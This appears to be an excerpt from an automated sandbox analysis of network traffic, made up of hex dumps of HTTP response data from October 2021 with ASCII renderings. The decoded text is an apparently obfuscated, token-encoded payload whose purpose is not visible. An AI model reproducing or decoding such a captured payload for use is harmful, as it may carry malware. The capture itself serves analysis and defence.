                                                                                                Data Ascii: MT TSP g i Mi Pi TMn UO n On Pg Up M UP Tn TMi O TTn TTg Pp pS pP gn pP OO Tg TP Pi TTO nO i U pi OP TSP MM TSS TT S PP gS gM TMg TSp TSi pi TSg Mp gn gg gP p Un TP TT Ui UT nM MU pP S Oi g T TSS nS PP iM U OT TSS TT TTO PO pT Mp Pn pM pn OP UP TT TSP TT
                                                                                                2021-10-26 15:35:12 UTC3664INData Raw: 20 6e 20 4f 69 20 70 55 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 4d 70 20 70 50 20 4f 50 20 54 20 54 53 6e 20 70 4f 20 4f 69 20 4d 20 70 53 20 4d 69 20 55 54 20 54 4d 20 54 6e 20 6e 20 4f 67 20 4f 69 20 70 6e 20 50 67 20 4d 4d 20 67 20 67 67 20 69 4f 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 4d 4f 20 4d 70 20 4f 20 54 4d 69 20 55 54 20 54 53 4f 20 4f 53 20 70 53 20 70 20 53 20 4d 20 4f 20 6e 54 20 54 4d 4d 20 54 4d 54 20 67 20 70 4d 20 70 50 20 50 50 20 54 69 20 50 69 20 70 20 6e 4d 20 6e 54 20 67 20 50 53 20 69 67 20 70 69 20 50 67 20 4d 69 20 54 54 70 20 4f 4d 20 55 50 20 6e 70 20 70 67 20 70 67 20 70 55 20 69 70 20 4d 67 20 6e 50 20 70 20 54 4d 67 20 54 54 4f 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 53 6e 20 55 4f 20
                                                                                                Data Ascii: n Oi pU TP iU Tn TT gn Mp pP OP T TSn pO Oi M pS Mi UT TM Tn n Og Oi pn Pg MM g gg iO TP Tg PS MT TSP g MO Mp O TMi UT TSO OS pS p S M O nT TMM TMT g pM pP PP Ti Pi p nM nT g PS ig pi Pg Mi TTp OM UP np pg pg pU ip Mg nP p TMg TTO TSP TTi Up US T TSn UO
                                                                                                2021-10-26 15:35:12 UTC3680INData Raw: 50 20 4d 4d 20 4d 4f 20 67 4f 20 4f 6e 20 4f 54 20 50 20 55 4d 20 50 4f 20 6e 69 20 67 50 20 50 4f 20 69 20 4f 53 20 55 6e 20 54 50 20 54 54 20 55 69 20 55 54 20 6e 4d 20 4d 55 20 70 53 20 54 53 4f 20 4f 6e 20 54 53 4f 20 54 53 53 20 69 55 20 67 4f 20 4d 69 20 50 53 20 6e 20 54 4d 53 20 6e 20 54 53 53 20 55 67 20 4d 20 50 20 67 4d 20 4d 55 20 67 69 20 54 53 70 20 55 4d 20 54 54 50 20 54 54 20 54 53 50 20 54 54 69 20 55 70 20 55 53 20 54 20 54 54 6e 20 4f 53 20 70 70 20 70 20 4d 20 54 70 20 70 6e 20 55 20 4d 4d 20 54 4d 50 20 54 4d 70 20 70 4f 20 54 54 4f 20 4d 70 20 4d 50 20 4d 4d 20 67 55 20 4d 20 54 4d 6e 20 54 53 53 20 55 4f 20 54 4d 6e 20 4d 4d 20 54 53 20 70 67 20 4d 6e 20 4d 20 54 54 20 54 54 67 20 4f 69 20 55 67 20 54 55 20 4d 53 20 70 67 20 67 54
                                                                                                Data Ascii: P MM MO gO On OT P UM PO ni gP PO i OS Un TP TT Ui UT nM MU pS TSO On TSO TSS iU gO Mi PS n TMS n TSS Ug M P gM MU gi TSp UM TTP TT TSP TTi Up US T TTn OS pp p M Tp pn U MM TMP TMp pO TTO Mp MP MM gU M TMn TSS UO TMn MM TS pg Mn M TT TTg Oi Ug TU MS pg gT
                                                                                                2021-10-26 15:35:12 UTC3696INData Raw: 20 6e 4d 20 55 67 20 70 53 20 67 69 20 54 55 20 55 53 20 6e 6e 20 50 53 20 54 4f 20 54 50 20 6e 54 20 69 50 20 54 53 20 50 20 54 54 20 67 54 20 4f 69 20 54 4d 69 20 54 53 67 20 4f 69 20 4d 50 20 69 20 50 54 20 50 6e 20 50 4d 20 54 54 4f 20 4d 20 4f 53 20 54 53 50 20 67 4f 20 54 54 20 67 20 70 53 20 6e 6e 20 54 50 20 69 55 20 54 6e 20 54 54 20 67 6e 20 70 54 20 70 4d 20 70 4d 20 4d 4f 20 54 53 6e 20 54 54 6e 20 70 20 54 20 69 20 70 69 20 54 50 20 6e 67 20 67 6e 20 54 53 70 20 70 50 20 54 54 6e 20 54 54 50 20 53 20 67 53 20 4d 6e 20 54 54 20 4d 67 20 54 50 20 54 67 20 50 53 20 4d 54 20 54 53 50 20 67 20 4d 53 20 54 54 20 54 53 20 4f 4f 20 55 67 20 54 4d 6e 20 54 54 6e 20 67 54 20 70 70 20 54 70 20 50 4f 20 67 50 20 55 54 20 70 55 20 54 4d 67 20 70 20 4d 4f
                                                                                                Data Ascii: nM Ug pS gi TU US nn PS TO TP nT iP TS P TT gT Oi TMi TSg Oi MP i PT Pn PM TTO M OS TSP gO TT g pS nn TP iU Tn TT gn pT pM pM MO TSn TTn p T i pi TP ng gn TSp pP TTn TTP S gS Mn TT Mg TP Tg PS MT TSP g MS TT TS OO Ug TMn TTn gT pp Tp PO gP UT pU TMg p MO
                                                                                                2021-10-26 15:35:12 UTC3711INData Raw: 6e 20 50 53 20 54 54 6e 20 50 4f 20 67 54 20 50 20 54 4d 20 4d 20 55 6e 20 69 55 20 54 54 6e 20 55 67 20 67 4d 20 50 4d 20 4d 70 20 54 20 4d 53 20 55 6e 20 70 70 20 4f 55 20 55 6e 20 67 4d 20 4d 70 20 54 54 6e 20 69 4d 20 4d 54 20 6e 53 20 54 54 55 20 4f 54 20 4f 53 20 69 4f 20 54 20 54 54 6e 20 69 4d 20 4d 54 20 6e 53 20 54 54 55 20 4f 54 20 4f 53 20 69 4f 20 70 53 20 4d 53 20 53 20 4d 54 20 54 53 54 20 55 4f 20 6e 53 20 4f 69 20 50 4f 20 6e 20 54 20 69 53 20 55 20 6e 53 20 55 50 20 4f 4d 20 70 4f 20 70 54 20 4d 4f 20 4d 6e 20 54 53 4f 20 50 67 20 4f 4d 20 70 50 20 6e 54 20 55 67 20 67 67 20 4d 67 20 54 54 6e 20 70 67 20 4d 54 20 55 67 20 55 69 20 54 4d 67 20 55 55 20 67 4d 20 70 50 20 6e 54 20 54 53 4f 20 67 69 20 55 6e 20 55 54 20 55 70 20 54 54 70 20
                                                                                                Data Ascii: n PS TTn PO gT P TM M Un iU TTn Ug gM PM Mp T MS Un pp OU Un gM Mp TTn iM MT nS TTU OT OS iO T TTn iM MT nS TTU OT OS iO pS MS S MT TST UO nS Oi PO n T iS U nS UP OM pO pT MO Mn TSO Pg OM pP nT Ug gg Mg TTn pg MT Ug Ui TMg UU gM pP nT TSO gi Un UT Up TTp
                                                                                                2021-10-26 15:35:12 UTC3727INData Raw: 70 69 20 54 53 50 20 54 54 4d 20 50 53 20 67 69 20 4f 54 20 69 55 20 54 54 70 20 54 54 50 20 54 54 70 20 54 4d 6e 20 4d 69 67 20 50 50 20 50 69 20 54 55 20 50 50 20 55 50 20 4f 70 20 4d 69 6e 20 54 54 70 20 54 54 55 20 67 4f 20 67 69 20 54 6e 55 20 54 50 4f 20 55 50 20 54 4d 69 20 54 4d 6e 20 54 4d 53 20 4f 55 20 54 6e 55 20 54 70 4f 20 69 55 20 67 4f 20 4d 54 67 20 55 67 20 54 53 53 20 69 50 20 54 54 6e 20 50 67 20 69 4f 20 67 50 20 54 55 4d 20 4d 69 53 20 54 54 4f 20 54 54 6e 20 54 53 4f 20 4f 55 20 54 6e 4f 20 4d 50 67 20 50 50 20 4d 4d 20 55 69 20 4f 70 20 4d 69 70 20 4f 70 20 4f 70 20 50 67 20 50 53 20 67 4f 20 67 4f 20 4d 54 4d 20 4d 54 50 20 54 54 4f 20 4f 4f 20 54 53 55 20 67 4f 20 67 67 20 54 6e 55 20 54 6e 54 20 55 70 20 54 4d 69 20 54 53 50 20
                                                                                                Data Ascii: pi TSP TTM PS gi OT iU TTp TTP TTp TMn Mig PP Pi TU PP UP Op Min TTp TTU gO gi TnU TPO UP TMi TMn TMS OU TnU TpO iU gO MTg Ug TSS iP TTn Pg iO gP TUM MiS TTO TTn TSO OU TnO MPg PP MM Ui Op Mip Op Op Pg PS gO gO MTM MTP TTO OO TSU gO gg TnU TnT Up TMi TSP
                                                                                                2021-10-26 15:35:12 UTC3743INData Raw: 55 20 4d 53 4d 20 54 4f 53 20 54 69 4f 20 4d 54 20 4d 50 54 20 54 20 54 69 54 20 54 50 54 20 67 53 20 55 53 20 54 54 20 54 53 6e 20 54 4d 69 20 4d 53 4d 20 67 70 20 67 4f 20 70 53 20 6e 67 20 54 4f 67 20 54 67 67 20 54 69 67 20 54 4d 55 20 54 67 4f 20 4d 54 4d 20 54 6e 53 20 70 20 4d 67 69 20 54 53 6e 20 69 53 20 4d 67 4f 20 69 70 20 70 50 20 4d 54 69 20 4f 70 20 4d 67 67 20 54 4f 50 20 54 50 4d 20 70 50 20 69 55 20 4d 69 70 20 54 50 6e 20 54 69 67 20 54 4d 55 20 54 6e 54 20 4f 70 20 4d 50 69 20 54 6e 53 20 54 67 4f 20 4d 54 55 20 4d 69 20 54 4d 4f 20 4d 50 50 20 4d 53 20 55 4d 20 50 54 20 54 69 55 20 54 69 20 54 55 4d 20 67 6e 20 6e 69 20 54 55 54 20 4d 53 54 20 6e 6e 20 4d 54 6e 20 54 53 4d 20 55 4f 20 54 54 20 69 69 20 69 70 20 50 67 20 50 20 4d 4d 70
                                                                                                Data Ascii: U MSM TOS TiO MT MPT T TiT TPT gS US TT TSn TMi MSM gp gO pS ng TOg Tgg Tig TMU TgO MTM TnS p Mgi TSn iS MgO ip pP MTi Op Mgg TOP TPM pP iU Mip TPn Tig TMU TnT Op MPi TnS TgO MTU Mi TMO MPP MS UM PT TiU Ti TUM gn ni TUT MST nn MTn TSM UO TT ii ip Pg P MMp
                                                                                                2021-10-26 15:35:12 UTC3759INData Raw: 53 50 20 4d 69 67 20 4d 67 54 20 6e 54 20 54 70 50 20 4d 53 6e 20 54 6e 67 20 54 54 4d 20 54 4f 4d 20 54 54 54 20 4d 54 69 20 70 70 20 55 54 20 4d 4d 20 54 67 6e 20 6e 53 20 4d 54 53 20 54 67 50 20 6e 67 20 4d 53 53 20 54 69 53 20 54 55 4d 20 54 53 4f 20 4d 4d 67 20 4d 67 54 20 54 69 6e 20 67 55 20 4d 67 20 54 69 70 20 4d 50 67 20 4d 4d 70 20 4d 4d 20 54 67 69 20 4d 54 67 20 54 4f 67 20 54 69 20 54 50 20 70 67 20 70 69 20 69 6e 20 54 50 50 20 54 54 4d 20 54 53 4f 20 54 53 50 20 54 4d 6e 20 4d 69 6e 20 54 50 55 20 54 54 55 20 54 54 53 20 4d 50 53 20 54 69 69 20 54 4d 69 20 54 20 54 4d 54 20 50 54 20 54 6e 4f 20 55 4f 20 55 54 20 4d 69 53 20 4d 53 54 20 67 53 20 54 70 20 54 6e 4f 20 55 55 20 69 70 20 4d 69 55 20 50 69 20 4f 55 20 4d 53 69 20 54 55 70 20 4f
                                                                                                Data Ascii: SP Mig MgT nT TpP MSn Tng TTM TOM TTT MTi pp UT MM Tgn nS MTS TgP ng MSS TiS TUM TSO MMg MgT Tin gU Mg Tip MPg MMp MM Tgi MTg TOg Ti TP pg pi in TPP TTM TSO TSP TMn Min TPU TTU TTS MPS Tii TMi T TMT PT TnO UO UT MiS MST gS Tp TnO UU ip MiU Pi OU MSi TUp O
                                                                                                2021-10-26 15:35:12 UTC3775INData Raw: 55 20 54 4f 67 20 4d 4d 55 20 4d 54 4f 20 67 53 20 4d 67 50 20 54 53 53 20 70 50 20 67 4d 20 55 4f 20 54 4f 53 20 54 4f 54 20 54 53 4f 20 4d 53 4f 20 4d 69 67 20 4d 69 54 20 54 4d 50 20 54 6e 70 20 54 4d 67 20 54 69 55 20 54 53 50 20 54 4f 6e 20 54 67 4d 20 4f 20 54 53 4f 20 54 53 69 20 54 6e 20 54 6e 50 20 4d 67 69 20 67 67 20 54 50 6e 20 54 70 4d 20 54 4f 67 20 54 69 4f 20 4d 50 4d 20 54 4f 4f 20 54 67 53 20 54 4f 4d 20 54 70 4d 20 54 4f 20 69 50 20 4d 55 20 54 69 70 20 54 6e 20 55 4f 20 54 6e 50 20 54 4d 4d 20 67 70 20 54 4f 54 20 4d 4d 55 20 6e 20 54 6e 53 20 4d 54 54 20 4d 53 50 20 4d 69 54 20 4d 55 20 4d 54 55 20 4f 69 20 50 55 20 54 53 4f 20 54 50 53 20 4f 69 20 54 6e 6e 20 55 67 20 4d 69 54 20 50 70 20 4d 53 4f 20 6e 67 20 54 50 70 20 54 67 70 20
                                                                                                Data Ascii: U TOg MMU MTO gS MgP TSS pP gM UO TOS TOT TSO MSO Mig MiT TMP Tnp TMg TiU TSP TOn TgM O TSO TSi Tn TnP Mgi gg TPn TpM TOg TiO MPM TOO TgS TOM TpM TO iP MU Tip Tn UO TnP TMM gp TOT MMU n TnS MTT MSP MiT MU MTU Oi PU TSO TPS Oi Tnn Ug MiT Pp MSO ng TPp Tgp
                                                                                                2021-10-26 15:35:12 UTC3791INData Raw: 54 69 20 4d 4f 20 54 55 4d 20 54 50 54 20 55 20 4d 67 55 20 54 55 50 20 55 6e 20 4d 4f 20 69 70 20 6e 20 4d 4d 67 20 69 69 20 54 69 50 20 4d 54 53 20 70 67 20 4d 4d 53 20 70 50 20 4d 67 4f 20 54 4f 53 20 55 20 70 54 20 69 70 20 53 20 54 4d 67 20 67 70 20 4f 53 20 69 54 20 4d 69 67 20 54 69 50 20 69 67 20 54 70 70 20 54 53 4d 20 69 69 20 4d 69 70 20 54 20 70 20 4d 67 20 70 6e 20 70 20 54 4f 4f 20 4d 53 70 20 54 67 67 20 54 50 53 20 67 6e 20 54 4f 53 20 54 55 6e 20 54 4d 4f 20 4d 67 50 20 67 6e 20 4d 69 53 20 54 53 4d 20 4d 53 20 4d 6e 20 54 67 69 20 69 20 67 4d 20 4d 54 69 20 4d 69 67 20 54 53 69 20 54 53 4f 20 4d 4d 4f 20 54 53 50 20 4d 67 67 20 69 69 20 4d 69 50 20 54 55 20 54 4d 50 20 4d 50 50 20 4d 50 20 54 4f 55 20 54 4f 54 20 54 55 4d 20 54 4d 4d 20
                                                                                                Data Ascii: Ti MO TUM TPT U MgU TUP Un MO ip n MMg ii TiP MTS pg MMS pP MgO TOS U pT ip S TMg gp OS iT Mig TiP ig Tpp TSM ii Mip T p Mg pn p TOO MSp Tgg TPS gn TOS TUn TMO MgP gn MiS TSM MS Mn Tgi i gM MTi Mig TSi TSO MMO TSP Mgg ii MiP TU TMP MPP MP TOU TOT TUM TMM
                                                                                                2021-10-26 15:35:12 UTC3807INData Raw: 4d 50 20 54 67 67 20 50 6e 20 54 4d 50 20 4d 53 70 20 70 54 20 53 20 55 4f 20 4d 54 67 20 4d 69 54 20 6e 53 20 4d 67 69 20 55 4d 20 54 6e 4d 20 54 50 50 20 54 4f 4d 20 4d 54 4f 20 54 69 67 20 54 50 54 20 54 4f 6e 20 4f 70 20 55 50 20 54 20 4d 69 53 20 69 6e 20 54 67 4d 20 50 70 20 4d 4d 6e 20 4d 55 20 54 6e 69 20 4d 54 55 20 54 54 4d 20 4d 4d 67 20 4f 6e 20 4d 67 20 69 54 20 54 50 4f 20 4d 4d 4d 20 54 4d 69 20 54 70 4d 20 4d 67 50 20 54 69 55 20 54 53 69 20 4d 67 6e 20 4d 4d 4f 20 54 67 4d 20 4d 55 20 69 54 20 6e 55 20 54 4d 4f 20 4d 53 70 20 54 54 69 20 6e 4f 20 54 20 54 4d 69 20 67 4d 20 4d 4d 4d 20 70 4d 20 4d 50 4d 20 54 54 69 20 67 69 20 55 50 20 4f 69 20 67 4f 20 4d 4d 54 20 54 6e 70 20 6e 4f 20 4d 54 4d 20 4d 69 4d 20 54 54 69 20 54 6e 4d 20 70 70
                                                                                                Data Ascii: MP Tgg Pn TMP MSp pT S UO MTg MiT nS Mgi UM TnM TPP TOM MTO Tig TPT TOn Op UP T MiS in TgM Pp MMn MU Tni MTU TTM MMg On Mg iT TPO MMM TMi TpM MgP TiU TSi Mgn MMO TgM MU iT nU TMO MSp TTi nO T TMi gM MMM pM MPM TTi gi UP Oi gO MMT Tnp nO MTM MiM TTi TnM pp
                                                                                                2021-10-26 15:35:12 UTC3823INData Raw: 6e 20 55 4d 20 69 53 20 54 4d 67 20 69 4d 20 4d 54 55 20 67 6e 20 54 4f 50 20 54 4d 4f 20 54 55 20 6e 54 20 4d 69 54 20 70 70 20 54 55 6e 20 4d 69 67 20 55 53 20 54 69 4d 20 4d 4d 53 20 54 4f 53 20 4d 4d 69 20 67 6e 20 69 67 20 67 50 20 4d 50 69 20 4d 67 55 20 6e 67 20 54 67 20 4d 55 20 50 4f 20 54 4f 53 20 67 4d 20 4d 69 54 20 4d 4d 69 20 4d 69 6e 20 55 50 20 55 69 20 4d 54 53 20 67 4f 20 4d 53 67 20 69 4d 20 4d 54 53 20 70 6e 20 54 55 53 20 54 54 6e 20 69 54 20 4d 69 55 20 4d 69 4f 20 54 67 20 54 69 55 20 6e 54 20 54 67 69 20 4f 4d 20 6e 50 20 54 53 4f 20 4f 67 20 54 6e 67 20 54 70 53 20 4d 69 50 20 54 69 67 20 4d 69 55 20 4d 50 4d 20 54 4f 55 20 54 53 53 20 4f 20 67 67 20 54 69 6e 20 69 69 20 4d 55 20 54 69 69 20 4f 69 20 4d 54 4d 20 4d 53 4d 20 4d 54
                                                                                                Data Ascii: n UM iS TMg iM MTU gn TOP TMO TU nT MiT pp TUn Mig US TiM MMS TOS MMi gn ig gP MPi MgU ng Tg MU PO TOS gM MiT MMi Min UP Ui MTS gO MSg iM MTS pn TUS TTn iT MiU MiO Tg TiU nT Tgi OM nP TSO Og Tng TpS MiP Tig MiU MPM TOU TSS O gg Tin ii MU Tii Oi MTM MSM MT
                                                                                                2021-10-26 15:35:12 UTC3839INData Raw: 67 4f 20 54 69 6e 20 4f 4d 20 67 4d 20 4d 4d 20 54 4d 55 20 54 6e 6e 20 54 50 20 54 70 4f 20 54 50 67 20 4d 69 70 20 54 55 50 20 4d 53 70 20 54 50 69 20 54 54 4d 20 55 4f 20 4d 69 70 20 6e 70 20 50 6e 20 4d 53 50 20 4d 4d 4d 20 54 50 4d 20 54 4f 67 20 4d 50 4d 20 67 6e 20 4f 54 20 4d 53 70 20 70 54 20 70 4d 20 54 55 20 54 6e 20 55 53 20 67 67 20 4d 69 70 20 4d 54 54 20 4d 53 4f 20 4d 67 67 20 4d 53 67 20 54 53 53 20 54 4d 53 20 4d 53 69 20 54 6e 6e 20 54 69 54 20 54 53 4d 20 54 53 55 20 4d 69 6e 20 54 55 50 20 54 55 55 20 54 4d 20 6e 20 4d 50 50 20 67 53 20 69 4d 20 4d 67 54 20 4f 55 20 4d 50 54 20 54 6e 4d 20 4d 50 20 54 55 4f 20 70 54 20 4d 69 50 20 4d 67 53 20 54 50 6e 20 50 4f 20 54 69 55 20 4d 69 53 20 54 70 4d 20 54 67 20 54 4d 53 20 4d 53 53 20 4d
                                                                                                Data Ascii: gO Tin OM gM MM TMU Tnn TP TpO TPg Mip TUP MSp TPi TTM UO Mip np Pn MSP MMM TPM TOg MPM gn OT MSp pT pM TU Tn US gg Mip MTT MSO Mgg MSg TSS TMS MSi Tnn TiT TSM TSU Min TUP TUU TM n MPP gS iM MgT OU MPT TnM MP TUO pT MiP MgS TPn PO TiU MiS TpM Tg TMS MSS M
                                                                                                2021-10-26 15:35:12 UTC3855INData Raw: 4f 20 4f 20 55 53 20 54 4f 55 20 54 69 6e 20 54 69 54 20 67 55 20 54 4f 53 20 54 50 4d 20 4d 54 50 20 54 55 55 20 4f 4f 20 55 55 20 70 20 4d 67 4f 20 54 70 4d 20 54 4d 54 20 4d 54 20 69 20 6e 4f 20 54 70 55 20 6e 50 20 54 50 54 20 55 70 20 54 70 54 20 54 50 55 20 54 55 70 20 4d 53 6e 20 54 53 55 20 54 4d 4f 20 54 54 50 20 54 54 6e 20 55 55 20 67 53 20 4f 4f 20 54 67 67 20 6e 20 50 20 4d 54 53 20 67 53 20 6e 54 20 54 67 4f 20 4d 53 54 20 54 50 50 20 54 53 69 20 4d 4d 67 20 69 50 20 67 4d 20 54 4d 55 20 54 55 6e 20 54 4d 20 54 53 54 20 54 6e 67 20 54 69 4f 20 55 67 20 54 50 6e 20 54 4f 20 54 4d 4f 20 69 20 54 55 4d 20 50 20 69 6e 20 54 70 20 4d 54 20 54 6e 50 20 4d 67 67 20 4d 69 54 20 54 4f 70 20 4d 69 53 20 54 4f 20 50 6e 20 50 20 50 69 20 54 69 6e 20 50
                                                                                                Data Ascii: O O US TOU Tin TiT gU TOS TPM MTP TUU OO UU p MgO TpM TMT MT i nO TpU nP TPT Up TpT TPU TUp MSn TSU TMO TTP TTn UU gS OO Tgg n P MTS gS nT TgO MST TPP TSi MMg iP gM TMU TUn TM TST Tng TiO Ug TPn TO TMO i TUM P in Tp MT TnP Mgg MiT TOp MiS TO Pn P Pi Tin P
                                                                                                2021-10-26 15:35:12 UTC3871INData Raw: 20 50 69 20 4d 69 69 20 4d 67 53 20 4d 69 4f 20 4d 53 55 20 54 6e 50 20 54 55 53 20 4d 4d 53 20 67 54 20 54 69 6e 20 54 53 20 4d 67 20 4f 54 20 70 4d 20 4f 53 20 4d 67 50 20 50 50 20 54 55 53 20 67 20 54 4f 55 20 4d 4d 6e 20 54 53 6e 20 4d 50 67 20 4d 4d 50 20 4f 6e 20 6e 4f 20 54 50 69 20 4d 53 4d 20 54 70 55 20 54 53 53 20 54 4d 20 54 69 67 20 4d 67 6e 20 54 69 54 20 54 54 55 20 54 6e 67 20 4d 69 54 20 69 69 20 4d 4d 4f 20 54 69 4f 20 55 4d 20 4d 69 70 20 50 6e 20 67 55 20 54 53 20 54 53 69 20 54 54 69 20 54 70 70 20 54 53 6e 20 54 53 4d 20 4d 54 50 20 54 6e 69 20 69 55 20 67 20 70 54 20 6e 6e 20 69 20 54 4f 55 20 55 4f 20 54 53 6e 20 55 6e 20 6e 50 20 54 70 69 20 6e 53 20 4d 53 54 20 6e 4f 20 54 67 4d 20 69 6e 20 70 4f 20 4d 53 67 20 54 6e 50 20 54 50
                                                                                                Data Ascii: Pi Mii MgS MiO MSU TnP TUS MMS gT Tin TS Mg OT pM OS MgP PP TUS g TOU MMn TSn MPg MMP On nO TPi MSM TpU TSS TM Tig Mgn TiT TTU Tng MiT ii MMO TiO UM Mip Pn gU TS TSi TTi Tpp TSn TSM MTP Tni iU g pT nn i TOU UO TSn Un nP Tpi nS MST nO TgM in pO MSg TnP TP
                                                                                                2021-10-26 15:35:12 UTC3887INData Raw: 69 20 69 50 20 4d 67 50 20 4d 55 20 4d 53 20 4d 67 50 20 4d 69 54 20 4d 67 69 20 54 6e 53 20 54 53 4d 20 54 53 70 20 54 6e 50 20 54 4f 4d 20 4d 67 69 20 54 4f 55 20 4d 50 67 20 54 4f 4d 20 54 70 6e 20 67 69 20 4d 53 20 54 54 70 20 6e 6e 20 4d 4d 6e 20 54 55 69 20 54 67 20 55 67 20 6e 70 20 69 4f 20 54 53 70 20 54 50 50 20 54 70 55 20 4d 4d 4d 20 54 69 20 67 4f 20 4d 54 4d 20 4f 69 20 70 50 20 4d 4d 20 4f 55 20 4d 54 4d 20 50 50 20 70 54 20 54 55 67 20 54 54 69 20 54 50 70 20 54 50 53 20 6e 69 20 4d 69 20 50 70 20 54 54 50 20 4d 53 69 20 54 55 4f 20 50 4d 20 55 20 4f 4d 20 4d 53 20 55 4f 20 4d 67 54 20 54 54 67 20 54 67 67 20 4d 54 6e 20 4d 69 67 20 54 55 54 20 54 53 53 20 54 4d 69 20 70 50 20 54 4d 4f 20 54 6e 53 20 55 53 20 4d 50 67 20 54 69 50 20 54 6e
                                                                                                Data Ascii: i iP MgP MU MS MgP MiT Mgi TnS TSM TSp TnP TOM Mgi TOU MPg TOM Tpn gi MS TTp nn MMn TUi Tg Ug np iO TSp TPP TpU MMM Ti gO MTM Oi pP MM OU MTM PP pT TUg TTi TPp TPS ni Mi Pp TTP MSi TUO PM U OM MS UO MgT TTg Tgg MTn Mig TUT TSS TMi pP TMO TnS US MPg TiP Tn
                                                                                                2021-10-26 15:35:12 UTC3903INData Raw: 55 70 20 69 6e 20 4d 70 20 67 50 20 54 69 54 20 4d 67 4f 20 54 6e 4d 20 67 70 20 55 55 20 54 67 67 20 4d 20 70 4f 20 4d 50 20 4d 67 54 20 54 54 55 20 4d 69 69 20 54 55 6e 20 4d 67 70 20 4d 67 54 20 54 54 20 4d 54 67 20 4f 67 20 4d 54 4f 20 67 50 20 67 6e 20 54 69 70 20 54 69 4d 20 4d 69 55 20 70 4d 20 54 70 20 54 55 6e 20 4f 67 20 4d 67 4f 20 50 55 20 4f 54 20 4d 4d 4d 20 4d 54 54 20 54 54 4f 20 54 4d 55 20 54 67 50 20 54 54 6e 20 54 69 54 20 54 70 50 20 70 4d 20 4d 69 70 20 69 50 20 50 70 20 70 70 20 54 53 53 20 54 6e 70 20 55 70 20 67 67 20 4d 67 69 20 54 4f 69 20 67 4d 20 4d 69 4d 20 67 67 20 6e 67 20 54 6e 6e 20 54 53 6e 20 54 20 67 20 54 4d 4d 20 53 20 54 54 54 20 4d 54 55 20 6e 4d 20 54 50 53 20 54 50 69 20 69 70 20 6e 67 20 54 67 4f 20 54 54 50 20
                                                                                                Data Ascii: Up in Mp gP TiT MgO TnM gp UU Tgg M pO MP MgT TTU Mii TUn Mgp MgT TT MTg Og MTO gP gn Tip TiM MiU pM Tp TUn Og MgO PU OT MMM MTT TTO TMU TgP TTn TiT TpP pM Mip iP Pp pp TSS Tnp Up gg Mgi TOi gM MiM gg ng Tnn TSn T g TMM S TTT MTU nM TPS TPi ip ng TgO TTP
                                                                                                2021-10-26 15:35:12 UTC3919INData Raw: 4d 69 70 20 54 6e 69 20 69 55 20 54 50 50 20 70 54 20 54 55 69 20 54 69 67 20 70 54 20 4d 4d 70 20 54 67 67 20 54 4f 20 54 4d 54 20 54 53 50 20 55 4d 20 69 70 20 69 70 20 54 4d 4d 20 67 70 20 69 4d 20 4d 67 55 20 54 70 53 20 4f 4f 20 50 55 20 54 4f 4d 20 54 4f 67 20 54 6e 54 20 54 4d 50 20 50 55 20 54 53 53 20 4d 67 69 20 54 54 70 20 4d 4f 20 54 69 50 20 67 54 20 54 50 53 20 54 50 69 20 54 6e 6e 20 54 4d 67 20 69 55 20 54 55 55 20 4d 50 67 20 4f 69 20 4d 50 4d 20 4d 53 67 20 54 6e 6e 20 54 70 4f 20 50 4d 20 54 50 20 4f 69 20 6e 6e 20 4d 54 4f 20 54 54 70 20 54 4f 6e 20 54 70 4d 20 6e 69 20 54 69 20 54 53 70 20 4f 50 20 54 55 4f 20 4f 20 50 55 20 54 4f 4f 20 55 69 20 54 70 4d 20 54 70 4d 20 54 69 4f 20 4d 50 67 20 69 4f 20 54 70 67 20 54 4d 53 20 4d 67 50
                                                                                                Data Ascii: Mip Tni iU TPP pT TUi Tig pT MMp Tgg TO TMT TSP UM ip ip TMM gp iM MgU TpS OO PU TOM TOg TnT TMP PU TSS Mgi TTp MO TiP gT TPS TPi Tnn TMg iU TUU MPg Oi MPM MSg Tnn TpO PM TP Oi nn MTO TTp TOn TpM ni Ti TSp OP TUO O PU TOO Ui TpM TpM TiO MPg iO Tpg TMS MgP
                                                                                                2021-10-26 15:35:12 UTC3935INData Raw: 67 4f 20 54 50 54 20 54 55 54 20 4d 67 6e 20 54 67 6e 20 54 70 55 20 69 69 20 4d 4d 6e 20 54 55 67 20 54 54 69 20 54 4f 53 20 4d 53 55 20 67 50 20 4d 53 4d 20 54 4f 54 20 54 55 6e 20 6e 67 20 54 54 50 20 4d 67 6e 20 69 69 20 54 4f 67 20 54 69 54 20 54 4d 6e 20 54 6e 69 20 54 69 50 20 4d 50 54 20 54 50 70 20 54 20 54 70 69 20 67 54 20 54 53 4f 20 54 69 54 20 54 54 20 4d 50 54 20 4d 53 4d 20 54 69 69 20 4d 69 53 20 54 6e 54 20 55 54 20 54 69 4d 20 6e 20 4d 55 20 70 4f 20 4d 50 54 20 4f 4d 20 54 67 70 20 54 4f 69 20 54 4d 6e 20 55 4d 20 54 54 6e 20 70 54 20 55 20 54 50 69 20 4d 4d 54 20 54 69 50 20 54 4f 4f 20 54 50 54 20 4d 4d 4f 20 54 4f 54 20 4d 69 70 20 54 67 50 20 54 55 55 20 54 6e 6e 20 54 4d 4f 20 54 54 4d 20 54 53 4d 20 4d 67 6e 20 54 53 53 20 54 53
                                                                                                Data Ascii: gO TPT TUT Mgn Tgn TpU ii MMn TUg TTi TOS MSU gP MSM TOT TUn ng TTP Mgn ii TOg TiT TMn Tni TiP MPT TPp T Tpi gT TSO TiT TT MPT MSM Tii MiS TnT UT TiM n MU pO MPT OM Tgp TOi TMn UM TTn pT U TPi MMT TiP TOO TPT MMO TOT Mip TgP TUU Tnn TMO TTM TSM Mgn TSS TS
